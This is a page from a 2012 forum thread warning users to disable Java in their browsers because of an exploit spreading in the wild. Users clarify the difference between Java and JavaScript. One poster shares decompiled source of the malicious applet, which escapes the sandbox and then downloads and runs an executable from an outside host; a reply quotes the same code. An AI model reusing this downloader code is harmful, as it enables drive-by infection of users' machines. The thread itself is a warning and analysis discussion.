« previous next »
Pages: 1 2 [3] 4 5 6 7

Author Topic: Warning - Disable your browser's Java - Malicious exploit hits web.  (Read 3957 times)

Gambsy

August 28, 2012, 12:07:59 PM
FYI for op: In safari
Preferences> Security > Enable Java[ ]
« Last Edit: August 28, 2012, 12:09:45 PM by Gambsy »

Ad Bot

Advertisement

Doomonkey

August 28, 2012, 12:09:09 PM
Quote from: Gambsy on August 28, 2012, 12:07:59 PM
FYI for op: In safari
Preferences> Security > Enable JavaScript[ ]
Already been stated that JavaScript isn't the same thing.

Gambsy

August 28, 2012, 12:09:57 PM
Quote from: Doomonkey on August 28, 2012, 12:09:09 PM
Already been stated that JavaScript isn't the same thing.

Fixed, Java is right next to it so :S

Blockzillahead

August 28, 2012, 12:18:18 PM
I disabled Java and JavaScript :)


Anyway we just have to wait until Oracle releases a new patch for Java. Then we will all be safe.

Ipquarx

August 28, 2012, 12:19:43 PM
Quote from: Blockzillahead on August 28, 2012, 12:18:18 PM
I disabled Java and JavaScript :)


Anyway we just have to wait until Oracle releases a new patch for Java. Then we will all be safe.
Javascript is not even closely comparable to Java. Javascript is safe to use.

Blockzillahead

August 28, 2012, 12:22:32 PM
Quote from: Ipquarx on August 28, 2012, 12:19:43 PM
Javascript is not even closely comparable to Java. Javascript is safe to use.

Will Hotspot Shield be of any use for this situation?

Blockzillahead

August 28, 2012, 12:23:31 PM
Eh I enabled it anyway. Now I'm located in Mexico :-)

Kalphiter

August 28, 2012, 12:32:28 PM
I reported sites using this exploit on July 10th. What I didn't provide was a mirror of the JAR file with the malicious code inside.

Here's a sample:
Code: [Select]
public class ggtull extends Applet
{

    public void start()
    {
        super.start();
        try
        {
            downloadFILE();
        }
        catch(Exception exception) { }
    }

    public ggtull()
    {
        String s = "setSecurityManager";
        HashSet hashset = new HashSet();
        Expression expression = new Expression(java/lang/System, s, new Object[1]);
        hashset.add(new upccqt(java/lang/System, s, new Object[1]));
        JList jlist = new JList(new Object[] {
            new wjkxxobsfj(this, hashset)
        });
        add(jlist);
    }

    public static void downloadFILE()
    {
        try
        {
            String s = (new StringBuilder()).append(System.getProperty("java.io.tmpdir")).append("hdgfsh.exe").toString();
            URL url = new URL("http://asancho.info/?735b218b16d6cdb8d86b4fab8e98082a");
            url.openConnection();
            InputStream inputstream = url.openStream();
            FileOutputStream fileoutputstream = new FileOutputStream(s);
            byte abyte0[] = new byte[8192];
            for(int i = 0; (i = inputstream.read(abyte0, 0, abyte0.length)) != -1;)
            {
                fileoutputstream.write(abyte0, 0, i);
            }

            inputstream.close();
            fileoutputstream.close();
            try
            {
                Runtime runtime = Runtime.getRuntime();
                runtime.exec(new String[] {
                    s
                });
            }
            catch(Exception exception1) { }
        }
        catch(Exception exception) { }
    }
}

Blockzillahead

August 28, 2012, 12:36:26 PM
Quote from: Kalphiter on August 28, 2012, 12:32:28 PM
I reported sites using this exploit on July 10th. What I didn't provide was a mirror of the JAR file with the malicious code inside.

Here's a sample:
Code: [Select]
public class ggtull extends Applet
{

    public void start()
    {
        super.start();
        try
        {
            downloadFILE();
        }
        catch(Exception exception) { }
    }

    public ggtull()
    {
        String s = "setSecurityManager";
        HashSet hashset = new HashSet();
        Expression expression = new Expression(java/lang/System, s, new Object[1]);
        hashset.add(new upccqt(java/lang/System, s, new Object[1]));
        JList jlist = new JList(new Object[] {
            new wjkxxobsfj(this, hashset)
        });
        add(jlist);
    }

    public static void downloadFILE()
    {
        try
        {
            String s = (new StringBuilder()).append(System.getProperty("java.io.tmpdir")).append("hdgfsh.exe").toString();
            URL url = new URL("http://asancho.info/?735b218b16d6cdb8d86b4fab8e98082a");
            url.openConnection();
            InputStream inputstream = url.openStream();
            FileOutputStream fileoutputstream = new FileOutputStream(s);
            byte abyte0[] = new byte[8192];
            for(int i = 0; (i = inputstream.read(abyte0, 0, abyte0.length)) != -1;)
            {
                fileoutputstream.write(abyte0, 0, i);
            }

            inputstream.close();
            fileoutputstream.close();
            try
            {
                Runtime runtime = Runtime.getRuntime();
                runtime.exec(new String[] {
                    s
                });
            }
            catch(Exception exception1) { }
        }
        catch(Exception exception) { }
    }
}

Mind sharing some sites that have had this exploit? Just to avoid them?

Blockzillahead

August 28, 2012, 12:37:48 PM
Wait what is this?

Code: [Select]
http://asancho.info/?735b218b16d6cdb8d86b4fab8e98082a
It's in the script file. I googled it before going to it and it doesn't exist.

Edit:
Code: [Select]
hdgfsh.exe
Googled that and it appears to be a Trojan that makes it's location at C:/Windows/Temp
« Last Edit: August 28, 2012, 12:40:07 PM by Blockzillahead »

Kalphiter

August 28, 2012, 12:38:59 PM
Quote from: Blockzillahead on August 28, 2012, 12:36:26 PM
Mind sharing some sites that have had this exploit? Just to avoid them?
Useless, they've all been long gone.

See my web forgery report:

Quote
http://w2.shawar.info/noot/img.html

Has 2 frames, one that loads Forex.com and another that runs a Java applet from a remote site, that downloads and executes "security shield" malware.
http://forums.malwarebytes.org/index.php?showtopic=107641

I'm going to change some values and then test the exploit.

Blockzillahead

August 28, 2012, 12:40:47 PM
Quote from: Kalphiter on August 28, 2012, 12:38:59 PM
Useless, they've all been long gone.

See my web forgery report:

I'm going to change some values and then test the exploit.

Um is it safe to go to those sites if they exist?

Placid

August 28, 2012, 12:41:35 PM
Quote from: Blockzillahead on August 28, 2012, 12:37:48 PM
Wait what is this?

Code: [Select]
http://asancho.info/?735b218b16d6cdb8d86b4fab8e98082a
It's in the script file. I googled it before going to it and it doesn't exist.
99% sure that its the script file, it's in the downloadFILE function and it's declaring that as a URL object and starting a connection with it.
just my assumption as a novice programmer though

Ipquarx

August 28, 2012, 12:42:21 PM
Quote from: Blockzillahead on August 28, 2012, 12:40:47 PM
Um is it safe to go to those sites if they exist?
Not if you have java enabled.

Blockzillahead

August 28, 2012, 12:42:46 PM
Quote from: Placid on August 28, 2012, 12:41:35 PM
99% sure that its the script file, it's in the downloadFILE function and it's declaring that as a URL object and starting a connection with it.
just my assumption as a novice programmer though

Oh I see.

Damn is there anyway to know a site has this exploit in it? Or it is just luck to find it?
Pages: 1 2 [3] 4 5 6 7
« previous next »